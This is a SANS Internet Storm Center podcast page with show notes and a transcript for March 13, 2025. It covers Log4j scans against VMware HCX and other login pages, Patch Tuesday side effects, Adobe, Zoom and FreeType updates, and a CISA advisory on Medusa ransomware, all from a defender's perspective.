Handler on Duty: Guy Bruneau
Threat Level: green
Podcast Detail
SANS Stormcast Thursday Mar 13th: Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates;
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9362.mp3
Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates;
00:00
My Next Class
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 5th - May 10th 2025 |
Log4J Scans for VMWare Hyhbrid Cloud Extensions
An attacker is scanning various login pages, including the authentication feature in the VMWare HCX REST API for Log4j vulnerabilities. The attack submits the exploit string as username, hoping to trigger the vulnerability as Log4j logs the username
https://isc.sans.edu/diary/Scans%20for%20VMWare%20Hybrid%20Cloud%20Extension%20%28HCX%29%20API%20(Log4j%20-%20not%20brute%20forcing)/31762
Patch Tuesday Fallout
Yesterday's Apple patch may re-activate Apple Intelligence for users who earlier disabled it. Microsoft is offering support for users whos USB printers started printing giberish after a January patch was applies.
https://www.macrumors.com/2025/03/11/ios-18-3-2-apple-intelligence-auto-on/
https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-22h2#usb-printers-might-print-random-text-with-the-january-2025-preview-update
Adobe Updates
Adobe updated seven different products, including Adobe Acrobat. The Acrobat vulnerability may lead to remote code execution and Adobe considers the vulnerablities critical.
https://helpx.adobe.com/security/security-bulletin.html
Medusa Ransomware
CISA and partner agencies released details about the Medusa Ransomware. The document includes many details useful to defenders.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
Zoom Update
Zoom released a critical update fixing a number of remote code execution vulnerabilities.
https://www.zoom.com/en/trust/security-bulletin/
FreeType Library Vulnerability
https://www.facebook.com/security/advisories/cve-2025-27363
iTunes
MP3 Download
RSS Feed
Google
Podbean
Amazon Echo
YouTube
Spreaker
Spotify
Discussion
New Discussions closed for all Podcasts older than two(2) weeks
Please send your comments to our Contact Form
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 5th - May 10th 2025 |
| Network Monitoring and Threat Detection In-Depth | Baltimore | Jun 2nd - Jun 7th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Washington | Jul 14th - Jul 19th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Las Vegas | Sep 22nd - Sep 27th 2025 |
Podcast Transcript
Hello and welcome to the Thursday, March 13th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida. One more mobility that's just not going away is Log4j. The latest example are some scans that I observed today against the VMware Hyper Cloud Extension or HCX API. This is a REST API and at first I thought it was just a brute force attempt I saw because the endpoint that the request was directed at, well, was used for login. It's the session and you just post a username and password to it and you'll get back a session key that's then being used as a bearer token. However, looking at the payload closer, well, the username was actually a log4j payload. This makes perfect sense, sort of in hindsight, that an attacker would use a username to inject a log4j payload because, well, that's the part that's usually logged from a request like this. And interestingly, the IP that was going after these VMware systems also went after a couple other login pages like some Cisco login pages and others that I yet have to identify. They're sort of just generic, like some just login. So it could be various applications that are being attacked here. And then we got a little bit of Patch Tuesday cleanup. First of all, the Apple update released yesterday that fixed the server day vulnerability in macOS and iOS. Apparently, after applying this update, some users reported that Apple intelligence is being reenabled. If they had it disabled first, that's Apple's artificial intelligence feature that typically is enabled by default, but you are able to disable it. Well, in Europe, I don't think it's available. So no issue with Europe here. This has been an issue in the last update as well. So nothing really terribly new here. Just be aware. And if you want it disabled, double check that it's still disabled. Nothing yet. I heard about yesterday's Microsoft update, but there are some reports that actually January update does cause some issues with USB printers. And it does cause them to print gibberish. If you're affected by this, I'll have a link to a statement from Microsoft here in the show notes. And yesterday when I was recording, Adobe had not released its Patch Tuesday update yet. Well, they have been released now. They updated a total of seven different applications. The one that's noteworthy here is Acrobat Reader. Of course, that's an old favorite when it comes to patching. And it fixes a number of critical remote code execution vulnerabilities. So definitely something that you need to apply if you're running Adobe Acrobat Reader. And CISA, in conjunction with some partner agencies, did publish a report about the Medusa malware. This is a ransomware. I'm always looking first for sort of initial access. In this case, it appears to be phishing. Of course, still very common. Screen connect. We talked about this before. And then the Fortinet EMS SQL injection vulnerability. Another sort of interesting TTP here I find is that they see it do some port scans internally. That's something that should sort of pop up in any kind of internal sensor. In particular, some of the odd ports they're scanning, like 3050, the Firebird database port, which isn't used much. So having all of a sudden lots of SYN scans on this port should be something that could trigger an alert. Other than that, a great read as usual. These reports are very useful to, first of all, make sure that you have blocked some of these initial access vectors as much as possible. That you have set up detection for the lateral movement, like these port scans. And then, of course, also just to check if you're not already infected. There are a number of IOCs and such listed in the report. And then let's look at some other patches. We got, first of all, Zoom released an update, fixing five vulnerabilities. Four of them are rated as high, meaning they lead to remote code execution, buffer overflows, buffer underflow, use after three. Sort of your standard vulnerabilities here. Updated. I find Zoom is pretty good in sort of keeping itself updated. So it shouldn't be a big issue. And then we got an update for the free type library. This is one of those font rendering libraries. Plenty of past vulnerabilities in libraries like this. This could lead to remote code execution. Problem with all these libraries is that, number one, they're everywhere. So you'll have to wait for things like browsers and other display software to be updated. Secondly, there are a lot of fonts being loaded sort of dynamically these days. And that's how a vulnerability like this could possibly be exploited. Well, and this is it again for today. Thanks for subscribing. Thanks for leaving good reviews. Thanks for telling everybody, friends and enemies, how great this podcast is. And get them to subscribe to it as well. Thanks and talk to you again tomorrow. Bye
© 2025 SANS™ Internet Storm Center
Developers: We have an API for you! 